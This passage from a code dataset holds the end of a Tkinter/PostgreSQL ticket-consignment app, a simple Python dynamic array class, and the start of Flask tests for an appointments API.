sticky=NSEW)\n self.txtBoxTicketCartón = ttk.Entry(\n self.mainframe4, width=10, textvariable=\"\")\n self.txtBoxTicketCartón.grid(column=1, row=8)\n self.txtBoxTicketCartón['state'] = \"readonly\"\n\n # Finalmente, le 
damos los valores contenidos a los widgets, pulsando el botón primer registro:\n if self.tipoVentana == \"secundaria\":\n # Variables de control específicas para la ventana secundaria, divisiones hechas:\n self.ventanaParaTodaLaClase.title(\"DIVISIONES HECHAS\")\n #Tenemos que obtener la lista de forma ascendente (asc), porque además de usarla para ver cantidad de registros, la necesitamos para obtener el último registro ingresado:\n self.todosLosIdDivisión = conversorListaSencilla(ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select id_división from divisiones_hechas order by id_división asc\"))\n self.idDivisión = IntVar(value=1)\n self.punto = StringVar() # Enlazada a self.txtBoxEntregó (textvariable = self.entregó)\n self.puntoComboBox = StringVar()\n self.SubTotalTicketsRecibidos = DoubleVar()\n self.ref_sec = IntVar()\n self.monto = DoubleVar()\n\n # Definimos sus widgets:\n ttk.Label(self.mainframe1, text=\"IdDIVISIÓN\").grid(\n column=1, row=1, sticky=NSEW)\n self.txtBoxIdDivisión = ttk.Entry(\n self.mainframe1, width=3, textvariable=self.idDivisión, state=DISABLED, style=\"estiloE1.TEntry\")\n self.txtBoxIdDivisión.grid(column=2, row=1, sticky=NSEW)\n\n # Widgets para el campo o columna punto:\n ttk.Label(self.mainframe1, text=\"PUNTO\").grid(\n column=3, row=2, sticky=NSEW)\n self.txtBoxPunto = ttk.Entry(\n self.mainframe1, width=9, textvariable=self.punto)\n self.txtBoxPunto.grid(column=4, row=2, sticky=NSEW)\n self.txtBoxPunto['state'] = 'readonly'\n\n # Widget tipo combobox para el campo punto que aparecerá temporalmente en los procesos de actualización e inserción de nuevos registros en la tabla :\n self.comboBoxPunto = ttk.Combobox(\n self.mainframe1, width=6, textvariable=self.puntoComboBox)\n self.comboBoxPunto.grid(column=4, row=2, sticky=NSEW)\n self.comboBoxPunto['state'] = 'readonly'\n self.comboBoxPunto.grid_remove()\n\n # Widgets para el campo o columna ref_sec:\n ttk.Label(self.mainframe1, text=\"REF/SEC\").grid(\n column=1, row=3, sticky=NSEW)\n self.txtBoxRef_Sec = ttk.Entry(\n self.mainframe1, width=9, textvariable=self.ref_sec)\n self.txtBoxRef_Sec.grid(column=2, row=3, sticky=NSEW)\n self.txtBoxRef_Sec['state'] = 'readonly'\n\n # Widgets para el campo o columna monto:\n ttk.Label(self.mainframe1, text=\"MONTO\").grid(\n column=3, row=3, sticky=NSEW)\n self.txtBoxMonto = ttk.Entry(\n self.mainframe1, width=9, textvariable=self.monto)\n self.txtBoxMonto.grid(column=4, row=3, sticky=NSEW)\n self.txtBoxMonto['state'] = 'readonly'\n\n # Atención: Si no meto la hoja dimensionada (height= 200, width = 200),\n # se meterá en el mainframe2, y \"estirará\" a este con el mayor tamaño prefijado por tksheet. En el caso de consignación no pasa,\n # porque el cuaderno se le dió un tamaño determinado. 
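\n                # Sketch: to size a Frame explicitly instead of letting its children\n                # dictate the size, geometry propagation can be switched off:\n                #   f = ttk.Frame(root, width=200, height=130)\n                #   f.grid_propagate(False)  # keep the fixed 200x130\n                # 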
Recuerde que mainframe2, como cualquier ttk.Frame, se ajusta automáticamente a los widgets que se le metan, al menos que su propiedad grid_propagate esté apagada (False).\n self.hojaTicketCartón = Sheet(\n self.mainframe2, column_width=70, align=\"center\", header_align=\"center\", height=130, width=200)\n #Note que hay dos tipos de self.hojaTiketsCartón: la de \"principal\" (consignación), que corresponde a la tabla tickets_cartón_recibidos, y este, a la tabla tickets_cartón_emitidos.\n self.hojaTicketCartón.headers([\"IdCARTÓN\", \"MONTO\"])\n self.hojaTicketCartón.grid(column=0, row=0)\n\n ttk.Label(self.mainframe4, text=\"SubTotalTicketCartón:\").grid(\n column=0, row=0, sticky=N)\n self.txtBoxTicketCartón = ttk.Entry(\n self.mainframe4, width=10, textvariable=self.SubTotalTicketsCartón)\n self.txtBoxTicketCartón.grid(column=0, row=1, sticky=N)\n self.txtBoxTicketCartón['state'] = \"readonly\"\n\n ttk.Label(self.mainframe4,\n text=\"SubTotalTickets - x%:\").grid(column=0, row=2, sticky=N)\n self.txtBoxTicketCartón = ttk.Entry(\n self.mainframe4, width=10, textvariable=\"\")\n self.txtBoxTicketCartón.grid(column=0, row=3)\n self.txtBoxTicketCartón['state'] = \"readonly\"\n\n # Cuarta y última parte: definimos los métodos que invocan los botones (tanto los de navegación, como los operativos). En los de navegación adoptamos el enfoque de\n # funciones lambdas en los argumentos command=, que permiten el uso de parámetros, y así poder usar un sólo método para todos los botones de navegación y no repetir n-botones el mísmo código n-veces para actualizar los widgets de datos ttl.Entry de mainframe1 y los tksheet en el cuaderno de pestañas:\n # Para los botones de operación (inserción y actualización), si utilizamos el llamado a procedimientos convencionales python:\n\n def BotónPulsado(self, *args):\n # print(\"Imprimir: \", args) #Fijese como se reciben los valores enviados desde las funciones lambdas\n # en los command. 
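\n            # e.g. command=lambda: self.BotónPulsado(\"avance\") arrives here as\n            # args == (\"avance\",), which is why args[0] is compared below.\n            # 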
Lo que manda es una tupla de valores, en este caso los botones mandan una tupla de un sólo elemento.\n # De modo que args es una tupla de un sólo elemento, (x, ), por ello para acceder a dicho valor, hay que referenciar con [0].\n # Como python no tiene swicht-case, usamos una seguidilla de if para ver en que posición vamos a poner self.posición, para la consecuente creación de los cursores con las respectivas sentencia sql según la columna no_consignación de la tabla consignación, en función de self.posición:\n # Primero que todo, determinamos todos los valores de la clave principal que recorrerá self.posición, según el tipoVentana:\n if self.tipoVentana == \"principal\":\n todosLosValores = self.todosLosNo_Consigna\n else:\n todosLosValores = self.todosLosIdDivisión\n\n # Y ahora aplicamos el condicional que corresponda sobre el tipo de ventana que se determinó arriba, que se está usando aquí:\n if args[0] == \"primero\":\n # Colocamos self.posición en la primera:\n self.posición = 0\n\n if args[0] == \"retroceso\":\n # Condición validadora de que no estamos en la primera posición (self.posición=0).\n if self.posición > 0:\n # Decrementamos la variable posición para retroceder al registro anterior.\n self.posición = self.posición-1\n else:\n pass\n\n if args[0] == \"avance\":\n if (self.posición) < len(todosLosValores) - 1:\n # Incrementamos la variable posición para avanzar al siguiente registro en la tabla.\n self.posición = self.posición+1\n else:\n pass\n\n if args[0] == \"último\":\n self.posición = len(todosLosValores) - 1\n\n if args[0] == \"ir_a\":\n # Colocamos self.posición al registro que queremos acceder directamente:\n if self.Ir_a.get() in todosLosValores:\n self.posición = todosLosValores.index(self.Ir_a.get())\n else:\n messagebox.showerror(\n message=\"Ese registro no existe.\", title='Error')\n\n # Una vez determinada la posición con los if anteriores, invocamos la función ResultadoConsulta según el tipo de ventana que lo invoca, resultado de la evaluación de los if de arriba, que emulan un swicht-case,\n # Para rellenar los widgets con su información respectiva según el registro en que lo sitúe self.posición:\n if self.tipoVentana == \"principal\":\n resultConsig = ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select no_consignación, fecha, entregó, id_cliente from consignación where no_consignación = %s\" % self.todosLosNo_Consigna[self.posición])[0] # Tomára el primer registro (la primera lista) de la lista de listas.\n # Le asignamos los valores a las variables de control tkinter del formulario principal de self.mainframe1, según los valores posicionales de la lista ResultadoConsulta:\n self.no_consig.set(resultConsig[0])\n self.fecha.set(resultConsig[1])\n self.entregó.set(resultConsig[2])\n self.idCliente.set(resultConsig[3])\n \n # Recuerde que el método ResultadoConsulta() retorna una lista de listas, que puede ser de una sola lista (consignación), o varias (tickets para los tksheet).\n self.hojaTicketBanco1.set_sheet_data(ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select ref, monto from ticket_banco1 where no_consignación = %s\" % self.todosLosNo_Consigna[self.posición]))\n self.hojaTicketCartón.set_sheet_data(ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select id_cartón, monto from ticket_cartón_recibidos where no_consignación = %s\" % self.todosLosNo_Consigna[self.posición]))\n\n # Procedemos a llenar los subtotales de los tickets. 
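\n                # The aggregate query pattern used for both subtotals (sketch,\n                # with an illustrative key value):\n                #   SELECT sum(monto) AS total FROM ticket_banco1\n                #   WHERE no_consignación = 42;  -- one row, one column (or NULL)\n                # 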
Utilizamos aquí la función agregada sum en la sentencia sql:\n # Recuerde que ResultadoConsulta retorna una lista de listas. [0][0] es el primer y único elemento de la primera y única lista en la lista de listas:\n resulConsulTiketsBanco1 = ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select sum(monto) as total from ticket_banco1 where no_consignación = %s\" % self.todosLosNo_Consigna[self.posición])[0][0]\n resulConsulTiketsCartón = ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select sum(monto) as total from ticket_cartón_recibidos where no_consignación = %s\" % self.todosLosNo_Consigna[self.posición])[0][0]\n\n # Posiblemente alguna consignación no tenga ni un ticket de alguno de los tipos de ticket en específico arrojando un None por su ResultadoConsulta. Para evitar el None hay que evaluar primero el resultado y luego asignarlo:\n if resulConsulTiketsBanco1 is None:\n resulConsulTiketsBanco1 = 0\n if resulConsulTiketsCartón is None:\n resulConsulTiketsCartón = 0\n self.SubTotalTicketsBanco1.set(resulConsulTiketsBanco1)\n self.SubTotalTicketsCartón.set(resulConsulTiketsCartón)\n\n # Fijese el tratamiento de las variables de control tkinter para obtener el total de ellos.\n self.TotalTickets.set(\n self.SubTotalTicketsBanco1.get() + self.SubTotalTicketsCartón.get())\n\n if self.tipoVentana == \"secundaria\":\n # Consultamos los datos para los widgets de mainframe1:\n resultDivisionesInicio = ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select id_división, fecha, punto, ref_secuencia, monto, id_cliente from divisiones_hechas where id_división = %s\" % self.todosLosIdDivisión[self.posición])[0]\n self.idDivisión.set(resultDivisionesInicio[0])\n self.fecha.set(resultDivisionesInicio[1])\n self.punto.set(resultDivisionesInicio[2])\n self.ref_sec.set(resultDivisionesInicio[3])\n self.monto.set(resultDivisionesInicio[4])\n self.idCliente.set(resultDivisionesInicio[5])\n\n # Recuerde que ResultadoConsulta retorna una lista de listas, lo que acepta un tksheet.\n self.hojaTicketCartón.set_sheet_data(ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select id_cartón, monto from tickets_cartón_emitidos where id_división = %s\" % self.idDivisión.get()))\n\n # Y para el subtotal de los tickets cartones en que se dividió el ticket en iddivisión:\n self.SubTotalTicketsCartón.set(ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select sum(monto) as total from tickets_cartón_emitidos where id_división = %s\" % self.idDivisión.get())[0][0])\n\n # Para los botones de operación (inserción y actualización). 
Recuerde que para preparar los widget para insertar o actualizar, puede ser dentro de los lambda de este método, BotónPulsado:\n if args[0] == \"nuevo\":\n #Primero establecemos que estamos tratando con una operación de inserción de nuevo registro:\n self.tipoDeOperación = \"insertar\"\n #Inicializamos los widgets según el tipo de ventana limpiando sus variables de control:\n if self.tipoVentana == \"principal\":\n #Note que para borrar el texto en no_consig (analogamente para id división), lo tenemos que setear en 0, puesto que es de tipo entero y se pasa indefectiblemente como argumento a la función Actualizar_Insertar:\n self.no_consig.set(0)\n self.entregó.set(\"\")\n self.hojaTicketBanco1.set_sheet_data(data=[[]])\n self.hojaTicketCartón.set_sheet_data(data=[[]])\n # Seteamos los valores de los widget en mainframe4 a cero según el tipoVentana:\n self.SubTotalTicketsBanco1.set(0)\n self.SubTotalTicketsCartón.set(0)\n self.TotalTickets.set(0)\n else:\n self.idDivisión.set(0)\n self.ref_sec.set(\"\")\n self.monto.set(value=0)\n self.hojaTicketCartón.set_sheet_data(data=[[]])\n self.SubTotalTicketsCartón.set(0)\n \n self.HabilitarWidgets()\n #Habilitamos el botón de confirmar inserción:\n self.botónIngresar['state'] = 'enabled'\n #Fecha es común al tipo de ventana, así que va fuera del if. Para inserción hacemos un tratamiento específico para fecha. Fijese como meto la fecha actual en formato date de forma automática, y self.fecha que es la variable de control tkinter de la clase StringVar, la toma directamente.\n self.fecha.set(datetime.now().strftime(\"%Y-%m-%d\"))\n self.txtBoxFecha['state'] = 'readonly'\n \n if args[0] == \"actualización\": \n self.tipoDeOperación = \"actualizar\"\n self.HabilitarWidgets()\n self.botónConfirmUpDate['state'] = 'enabled'\n\n #Definimos lo métodos de actualización e inserción:\n def Actualizar(self, *args):\n \"Duré una semana atascado aquí para darme cuenta que tenía que hacer esta definición de método a parte, puesto que estaba usando este método como implementación lambda dentro del método BotónPulsado, y claro, me volvía a poner en la variable de control self.entregó, el valor original que está en la base de datos, puesto que cada vez que se invoca, resulConsigna allá arriba se vuelve a llenar con los valores que están establecidos en la base de datos, y los nuevo en los txtBoxEntregó y txtBoxFecha son volados por estos.\"\n #self.tipoDeOperación = \"actualizar\"\n self.Operación()\n self.DeshabilitarWidgets()\n \n def Insertar(self, *args):\n #self.tipoDeOperación = \"insertar\"\n self.Operación()\n self.DeshabilitarWidgets()\n #Tenemos que actualizar todosLosNoConsigna o todosLosNoIdDivisión según sea el caso:\n if self.tipoVentana == \"principal\":\n self.todosLosNo_Consigna = conversorListaSencilla(ResultadoConsulta(self.conexiónParaTodaLaClase, \"select no_consignación from consignación order by no_consignación asc\"))\n else:\n self.todosLosIdDivisión = conversorListaSencilla(ResultadoConsulta(self.conexiónParaTodaLaClase, \"select id_división from divisiones_hechas order by id_división asc\"))\n #Nos pondrá en el último registro que será el recién ingresado, o el anterior último si no se da la inserción:\n self.BotónPulsado(\"último\")\n\n def Eliminar(self, *args):\n respuesta = messagebox.askyesno(\n message=\"Está a punto de eliminar este registro. 
Si le da a sí, lo borrará irreversiblemente.\", title=\"Borrar Registro\")\n if respuesta:\n if self.tipoVentana == \"principal\":\n Eliminación(self.conexiónParaTodaLaClase, self.tipoVentana,self.no_consig.get())\n else:\n Eliminación(self.conexiónParaTodaLaClase, self.tipoVentana,self.idDivisión.get())\n\n if self.tipoVentana == \"principal\":\n self.todosLosNo_Consigna = conversorListaSencilla(ResultadoConsulta(self.conexiónParaTodaLaClase, \"select no_consignación from consignación order by no_consignación asc\"))\n else:\n self.todosLosIdDivisión = conversorListaSencilla(ResultadoConsulta(self.conexiónParaTodaLaClase, \"select id_división from divisiones_hechas order by id_división asc\"))\n\n self.BotónPulsado(\"último\")\n\n def HabilitarWidgets(self, *args):\n \"Trabaja conjuntamente con Operación, y posteriormente a este, DeshabilitarWidgets, y es el método que habilita todos los widgets pertinentes para la operación sobre ellos, sea actualización, inserción o eliminación de registros.\"\n # Deshabilitamos todos los botones de navegación, todos los widgets de mainframe3 o mainframe5 según sea insertar o actualizar:\n for widget in self.mainframe3.winfo_children(): widget['state'] = DISABLED\n for widget in self.mainframe5.winfo_children(): widget['state'] = DISABLED\n\n if self.tipoDeOperación == \"insertar\": self.botónNuevoRegis['state'] = DISABLED \n if self.tipoDeOperación == \"actualizar\": self.botónUpdate['state'] = DISABLED\n\n # Habilitamos los widgets comunes. Invisibilizamos self.txtBoxIdCliente y visibilizamos comboBoxIdCliente mientras actualizamos:\n self.txtBoxIdCliente.grid_remove()\n self.txtBoxFecha['state'] = 'enabled'\n\n # Metemos la lista de idClientes que existen actualmente en al tabla cliente:\n self.comboBoxIdCliente['values'] = conversorListaSencilla(ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select id_cliente from cliente\"))\n self.comboBoxIdCliente.grid()\n \n if self.tipoVentana == \"principal\":\n # Habilitamos los widgets en mainframe1 para este caso:\n self.txtBoxEntregó['state'] = 'enabled'\n # Habilitamos los tksheet:\n self.hojaTicketBanco1.enable_bindings(bindings=\"all\")\n self.hojaTicketCartón.enable_bindings(bindings=\"all\")\n if self.tipoDeOperación == \"actualizar\":\n #Con readonly_columns es que se bloquean las columnas. Puede ser un grupo de columnas (lista), referenciadas a partir de 0 para la primera:\n self.hojaTicketBanco1.readonly_columns(columns = [0], readonly = True, redraw = False)\n self.hojaTicketCartón.readonly_columns(columns = [0], readonly = True, redraw = False)\n \n if self.tipoVentana == \"secundaria\":\n # Removemos txtBoxPunto y lo sustituimos temporalmente por comboBoxPunto. 
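\n                # The hide/show idiom (sketch): grid_remove() hides the widget but\n                # remembers its grid options, so a bare grid() restores it in place:\n                #   w.grid_remove()   # hide, options kept\n                #   w.grid()          # show again in the same cell\n                # 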
Recuerde que ya hicimos lo propio con el combobox común, comboBoxIdCliente, al principio del método:\n self.txtBoxPunto.grid_remove()\n\n # Metemos la lista de puntos que existen actualmente cuentas:\n self.comboBoxPunto['values'] = conversorListaSencilla(ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select banco from cuentas\"))\n self.comboBoxPunto.grid()\n\n # Habilitamos los widgets pertinentes de mainframe1:\n self.txtBoxRef_Sec['state'] = 'enabled'\n self.txtBoxMonto['state'] = 'enabled'\n self.hojaTicketCartón.enable_bindings(bindings=\"all\")\n if self.tipoDeOperación == \"actualizar\": self.hojaTicketCartón.readonly_columns(columns = [0], readonly = True, redraw = False)\n\n def DeshabilitarWidgets(self, *args):\n \"Este es el método para deshabilitar los widgets que se habián habilitado para hacer la operación según el tipo de operaciones y ventana. En pocas palabras, es la función inversa de HabilitarWidgets.\"\n # Deshabilitamos los widgets en mainframe1, independientemente del resultado de la actualización (procedente, no, cancel o excepción):\n for widget in self.mainframe1.winfo_children(): widget['state'] = 'readonly'\n \n # Rehabilitamos los botones en mainframe3 y mainframe5:\n for widget in self.mainframe3.winfo_children(): widget['state'] = 'enabled'\n for widget in self.mainframe5.winfo_children(): widget['state'] = 'enabled'\n\n #Haciendo la operación inversa de HabilitarWidgets, remuevo el comboBox común, comboBoxIdCliente, y revisibilizo a txtBoxIdCliente:\n self.comboBoxIdCliente.grid_remove()\n #Para refrescar txtBoxIdCliente, debo actualizar su variable de control, de lo contrario mostrará la que le había asignado antes BotónPulsado (recuerde que ese widget no se toco porque se había removido para darle paso al txtComboboxIdCliente). Igualmente para punto:\n self.idCliente.set(self.idClienteComboBox.get())\n self.txtBoxIdCliente.grid()\n\n #Para el nó común, si la ventana es de tipo secundaria:\n if self.tipoVentana == \"secundaria\":\n self.comboBoxPunto.grid_remove()\n self.punto.set(self.puntoComboBox.get())\n self.txtBoxPunto.grid()\n \n #Ahora deshabilitamos los widgets específicos según el tipo de ventana:\n if self.tipoVentana == \"principal\":\n # Deshabilitamos todos enlaces en los tksheets.\n self.hojaTicketBanco1.disable_bindings()\n self.hojaTicketCartón.disable_bindings()\n #Si se hizo una actulización, hay que volver a habilitar las columnas de tickets banco1 y cartón recibidos (readonly = True):\n if self.tipoDeOperación == \"actualizar\":\n #Con readonly_columns es que se bloquean las columnas. 
It can take a group of columns (a list), indexed from 0 for the first one:\n                self.hojaTicketBanco1.readonly_columns(columns = [0], readonly = False, redraw = False)\n                self.hojaTicketCartón.readonly_columns(columns = [0], readonly = False, redraw = False)\n        if self.tipoVentana == \"secundaria\":\n            self.hojaTicketCartón.disable_bindings()\n            if self.tipoDeOperación == \"actualizar\":\n                self.hojaTicketCartón.readonly_columns(columns = [0], readonly = False, redraw = False)\n\n        # Finally, disable the operation-execution buttons, regardless of which operation type it was:\n        self.botónIngresar['state'] = DISABLED\n        self.botónConfirmUpDate['state'] = DISABLED\n\n    def Operación(self, *args):\n        \"This method essentially filters by the operation type, sending the relevant parameters to execute the requested SQL operation.\"\n        respuesta = messagebox.askyesnocancel(\"Do you want to execute the operation?\", \" Check the input\")\n        if respuesta is not None:\n            if respuesta:\n                # First, build the lists-of-lists to send for each case. There are two Actualización_Inserción calls: one for mainframe1, and one for the tksheets in mainframe2 (get_sheet_data):\n                if self.tipoVentana == \"principal\":\n                    Actualización_Inserción(self.conexiónParaTodaLaClase, [[self.idClienteComboBox.get(), self.fecha.get(), self.entregó.get(), self.no_consig.get()]], self.tipoDeOperación, self.tipoVentana, \"mainframe1\")\n                    # We must check that the sheets actually hold data before updating/inserting the ticket tksheets. For now this check only works partially, as long as nothing is written and then erased in a given sheet:\n                    if self.hojaTicketBanco1.get_sheet_data()[0] != []:\n                        Actualización_Inserción(self.conexiónParaTodaLaClase, self.hojaTicketBanco1.get_sheet_data(), self.tipoDeOperación, self.tipoVentana, \"mainframe2TicketsBanco1\")\n                    if self.hojaTicketCartón.get_sheet_data()[0] != []:\n                        Actualización_Inserción(self.conexiónParaTodaLaClase, self.hojaTicketCartón.get_sheet_data(), self.tipoDeOperación, self.tipoVentana, \"mainframe2TicketsCartón\")\n                else:\n                    Actualización_Inserción(self.conexiónParaTodaLaClase, [[self.fecha.get(), self.puntoComboBox.get(), self.ref_sec.get(), self.monto.get(), self.idClienteComboBox.get(), self.idDivisión.get()]], self.tipoDeOperación, self.tipoVentana, \"mainframe1\")\n                    # As we know, in the \"secundaria\" case self.hojaTicketCartón is the sheet of divisions made (it shares its name with the received-tickets one):\n                    if self.hojaTicketCartón.get_sheet_data()[0] != []:\n                        Actualización_Inserción(self.conexiónParaTodaLaClase, self.hojaTicketCartón.get_sheet_data(), self.tipoDeOperación, self.tipoVentana, \"mainframe2TicketsCartón\")\n\n    def EmergenteDivisionesHechas(self, *args):\n        # Create the raw Toplevel widget (the client) and pass it as an argument when instantiating GeometríaBase, so that that geometry instance gives shape to the Toplevel widget passed in. That class is a contractor whose job is \"grooming\" the raw Toplevel widget it is handed.\n        self.top = Toplevel(self.ventanaParaTodaLaClase)\n        self.top.grab_set() # The grab_set method funnels every event to the widget it is applied to, making it de facto modal. This is the most direct way to make a widget modal. 
Another good thing about grab_set() is that when the widget it was applied to is destroyed, all the other open windows are re-enabled automatically,\n        # without any extra code for it. Careful: if grab_set is applied after instantiating GeometríaBase to produce nuevaVentana, the widgets inside that window that use top as their base will not be covered by the grab (grab: claiming all the attention for itself, disabling every other widget), leaving the widgets in the main window usable.\n        # And here is the magic of self-instantiation, i.e. recursive instantiation:\n        # If the new GeometríaBase widget instance is not kept in a reference, it will not become visible. That is why vscode does not underline it as an \"unused variable\", even though its BotónPulsado method is not invoked below.\n        self.nuevaVentana = GeometríaBase(\n            self.top, self.conexiónParaTodaLaClase, \"secundaria\")\n        # And of course, initialise the new instance at the first position:\n        self.nuevaVentana.BotónPulsado(\"primero\")\n\n    # Finally, create the first and definitive \"bootstrap\" instance, which lives for the whole run of the program, by instantiating GeometríaBase to get started:\n    ventana = GeometríaBase(raíz, conexión, \"principal\")\n    # On that first instance, invoke BotónPulsado at the first position to load the widgets' control variables with the data of the first record in the consignación table (\"principal\"):\n    ventana.BotónPulsado(\"primero\")\n    raíz.mainloop()\n\nexcept (Exception, psycopg2.DatabaseError) as error:\n    # Note how extra text is appended to the messagebox message.\n    messagebox.showerror(message=str(\n        error)+\" Connection problems, the program will close.\", title='Error')\n\n# If the connection succeeded, close it before the program ends:\nif conexión is not None:\n    conexión.close()\nprint(\"Connection closed... bye.\")\n# 110521: 687 lines. Will I manage to get them down to half? 
A: That will not be possible, because I am condensing all the code into a single class, which will make the class bigger, but the overall code across all the modules will end up well under half.\n","sub_path":"CtrlTicket.py","file_name":"CtrlTicket.py","file_ext":"py","file_size_in_byte":49663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"12241118","text":"import ctypes\n\nclass DynamicArray:\n\n    \"\"\" Returns the length of the array \"\"\"\n    def __init__(self):\n        self._size = 0\n        self._capacity = 1\n        self._arr = self._make_array(self._capacity)\n\n    def __len__(self):\n        return self._size\n\n    ''' Returns the item at index i '''\n    def __getitem__(self, i):\n        if not 0 <= i < self._size:\n            raise IndexError(\"Index out of bound\")\n        return self._arr[i]\n\n    ''' adds item to the end of the array '''\n    def append(self, item):\n        if self._size == self._capacity:\n            self._resize(self._capacity * 2)\n        self._arr[self._size] = item\n        self._size += 1\n\n    ''' private method to resize the array '''\n    def _resize(self, c):\n        temp = self._make_array(c)\n        for i in range(self._size):\n            temp[i] = self._arr[i]\n        self._arr = temp\n        self._capacity = c\n\n    ''' private method to create an array of capacity c '''\n    def _make_array(self, c):\n        return (c * ctypes.py_object)()\n\n    ''' printing the array '''\n    def __str__(self):\n        if self._size == 0:\n            return \"[]\"  # guard: the loop below would index self._arr[-1] on an empty array\n        temp = \"[\"\n        for i in range(self._size - 1):\n            temp += str(self._arr[i]) + \", \"\n        temp += str(self._arr[self._size - 1]) + \"]\"\n        return temp\n\nif __name__ == \"__main__\":\n    a = DynamicArray()\n\n    for i in range(10):\n        a.append(i)\n        print(a[i])\n\n","sub_path":"study/Arrays/DynamicArray.py","file_name":"DynamicArray.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"635204536","text":"import json\nimport datetime as dt\nfrom dateutil import parser\nfrom project import db\nfrom project.test.test_base import TestBase\nfrom project.models.availability import Availability, create_availability\nfrom project.models.event import Event, add_event\nfrom project.models.user import User, add_user\nfrom project.models.appointment import Appointment, add_appointment\nfrom project.models.participant import Participant, create_participant\n# from calendar import NEXT_X_DAYS # TODO fix import and remove placeholder\nfrom unittest.mock import patch\n\nNEXT_X_DAYS = 90 # TODO this should be the exact same value as in\n# TODO appointment_handler.py\n\n\ndef create_appointment_json(start='2020-02-20T08:30:00Z',\n                            comments='Look forward to seeing you!',\n                            name='Little Timmy',\n                            email='timmy@mail.com') -> str:\n    \"\"\"\n    Creates and returns a JSON dump to POST an Appointment.\n    :param start: start time of the event in ISO 8601\n    :param comments: comments from the participant to the event creator\n    :param name: the participant's name\n    :param email: the participant's email\n    :return: JSON dump\n    \"\"\"\n    request = {\n        'start': start,\n        'comments': comments,\n        'participant': {\n            'name': name,\n            'email': email\n        }\n    }\n    return json.dumps(request)\n\n\nclass AppointmentGetAllTest(TestBase):\n    def test_get_appointments(self):\n        \"\"\"Tests whether appointments can be successfully requested.\"\"\"\n        add_user()\n        db.session.commit()\n        user = User.query.first()\n        add_event(user_id=user.id, availability=create_availability())\n        db.session.commit()\n        event = Event.query.first()\n        name = 'Jimmy Joe'\n        comments = \"OMG I haven't seen you in forever Jimmy how has it 
been?\"\n        start = dt.datetime.now(dt.timezone.utc)\n        add_appointment(event_id=event.id,\n                        participants=[create_participant(name=name)],\n                        comments=comments,\n                        start=start)\n        db.session.commit()\n        auth_token = user.encode_auth_token(user.id)\n\n        response = self.api.get(\n            f'/users/{user.public_id}/events/{event.url}/'\n            f'appointments',\n            headers={'x-access-token': auth_token},\n            content_type='application/json')\n\n        data = json.loads(response.data.decode())\n        appointment = data[0]\n        participants = appointment['participants'][0]\n\n        self.assertEqual(response.status_code, 200)\n        self.assertEqual(appointment['comments'], comments)\n        self.assertEqual(participants['name'], name)\n        self.assertEqual(parser.isoparse(appointment['start']), start)\n\n    def test_get_all_appointments(self):\n        \"\"\"Tests getting all appointments from a user.\"\"\"\n        add_user()\n        db.session.commit()\n        user = User.query.first()\n        # Create 2 events\n        event1 = add_event(user_id=user.id,\n                           availability=create_availability(),\n                           name=\"First Event\",\n                           url=\"my first url\")\n\n        event2 = add_event(user_id=user.id,\n                           availability=create_availability(),\n                           name=\"Second Event\",\n                           url=\"my second url\")\n        db.session.commit()\n        start = dt.datetime.now(dt.timezone.utc)\n        # add appointment to event 1\n        add_appointment(event_id=event1.id,\n                        participants=[\n                            create_participant(name=\"John\",\n                                               email=\"john@test.com\")\n                        ],\n                        comments=\"comments\",\n                        start=start)\n        # add appointment to event 2\n        add_appointment(event_id=event2.id,\n                        participants=[\n                            create_participant(name=\"Bonnie\",\n                                               email=\"Bonnie@test.com\")\n                        ],\n                        comments=\"comments\",\n                        start=start + dt.timedelta(days=1))\n        db.session.commit()\n        auth_token = user.encode_auth_token(user.id)\n\n        resp_with_query_param = self.api.get(\n            f'/users/{user.public_id}/appointments?event_url={event1.url}',\n            headers={'x-access-token': auth_token},\n            content_type='application/json')\n        data_with_query = json.loads(resp_with_query_param.data.decode())\n\n        resp_no_query_param = self.api.get(\n            f'/users/{user.public_id}/appointments',\n            headers={'x-access-token': auth_token},\n            content_type='application/json')\n\n        data_no_query_param = json.loads(resp_no_query_param.data.decode())\n\n        self.assertEqual(len(data_with_query), 1)\n\n        self.assertEqual(len(data_no_query_param), 2)\n\n    def test_bad_token(self):\n        \"\"\"Tests whether a request with an invalid token returns a 403\n        response.\"\"\"\n        add_user(email='test1@email.com')\n        add_user(email='test2@email.com')\n        db.session.commit()\n        user1 = User.query.filter_by(email='test1@email.com').first()\n        user2 = User.query.filter_by(email='test2@email.com').first()\n        add_event(user1.id, create_availability())\n        db.session.commit()\n        event1 = Event.query.filter_by(user_id=user1.id).first()\n        add_appointment(event_id=event1.id,\n                        participants=[create_participant()])\n        db.session.commit()\n\n        auth_token2 = user2.encode_auth_token(user2.id)\n        route = f'/users/{user1.public_id}/events/{event1.url}/appointments'\n        response = self.api.get(route,\n                                headers={'x-access-token': auth_token2},\n                                content_type='application/json')\n        data = json.loads(response.data.decode())\n\n        self.assertEqual(response.status_code, 403)\n        self.assertEqual(data['message'],\n                         \"You do not have permission to access this content\")\n\n    def test_missing_token(self):\n        \"\"\"Tests whether a request with a missing token returns a 401\n        response\"\"\"\n        add_user(email='test1@email.com')\n        db.session.commit()\n        user = User.query.first()\n        add_event(user.id, create_availability())\n        
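# Flush the pending fixtures; the appointment added below needs the event's id.\n        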
